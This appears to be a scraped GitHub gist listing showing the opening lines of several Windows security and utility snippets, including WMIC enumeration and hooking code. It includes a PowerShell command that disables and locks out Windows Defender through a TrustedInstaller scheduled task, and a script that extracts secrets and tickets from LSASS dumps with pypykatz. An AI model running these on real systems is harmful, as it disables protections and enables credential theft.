@xorrior
xorrior / wmic_cmds.txt
Last active May 12, 2024 13:32
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@ghorsington
ghorsington / win32_hook.h
Last active May 3, 2024 22:14
EAT and IAT hook
/*
* EAT-based hooking for x86/x64.
*
* Big thanks to ez (https://github.com/ezdiy/) for making this!
*
* Creates "hooks" by modifying the module's export address table.
* The procedure works in three main parts:
*
* 1. Reading the module's PE file and getting all exported functions.
* 2. Finding the right function to "hook" by simple address lookup
/*
* fork.c
* Experimental fork() on Windows. Requires NT 6 subsystem or
* newer.
*
* Copyright (c) 2012 William Pitcock <nenolod@dereferenced.org>
*
* Permission to use, copy, modify, and/or distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
@lpBunny
lpBunny / process_list_without_handles.cpp
Created May 27, 2021 22:10
List process information including process architecture and username without opening any handles
/*
*
* List process information on windows without opening any handles, including process architecture and username
*
*/
#include <Windows.h>
#include <stdio.h>
#include <math.h>
@tyranid
tyranid / doh.ps1
Created May 4, 2020 15:17
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@mathiasbynens
mathiasbynens / appify
Created November 12, 2010 13:46 — forked from subtleGradient/appify
appify — create the simplest possible Mac app from a shell script
#!/bin/bash
if [ "$1" = "-h" -o "$1" = "--help" -o -z "$1" ]; then cat <<EOF
appify v3.0.1 for Mac OS X - http://mths.be/appify
Creates the simplest possible Mac app from a shell script.
Appify takes a shell script as its first argument:
`basename "$0"` my-script.sh
@odzhan
odzhan / winflate.c
Last active March 30, 2024 01:39
Deflate Compression On Windows
/**
BSD 3-Clause License
Copyright (c) 2019 Odzhan. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
@odzhan
odzhan / xpress.c
Last active February 18, 2024 20:57
Xpress Compression Utility
/**
BSD 3-Clause License
Copyright (c) 2019 Odzhan. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
@xpn
xpn / clr_via_native.c
Created April 11, 2018 21:34
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@seajaysec
seajaysec / mymykat.sh
Last active January 21, 2024 00:03
super rough plaintext secret parser for pypykatz dumps
#!/bin/bash
# prereqs: pypykatz, all the dumps in current working dir
mkdir ./ppktz_tickets 2>/dev/null
ext='.dmp'
for i in *$ext; do
txtfile=${i::-3}txt
secrets=${i::-3}secrets
pypykatz lsa minidump $i -o $txtfile -k ./ppktz_tickets/;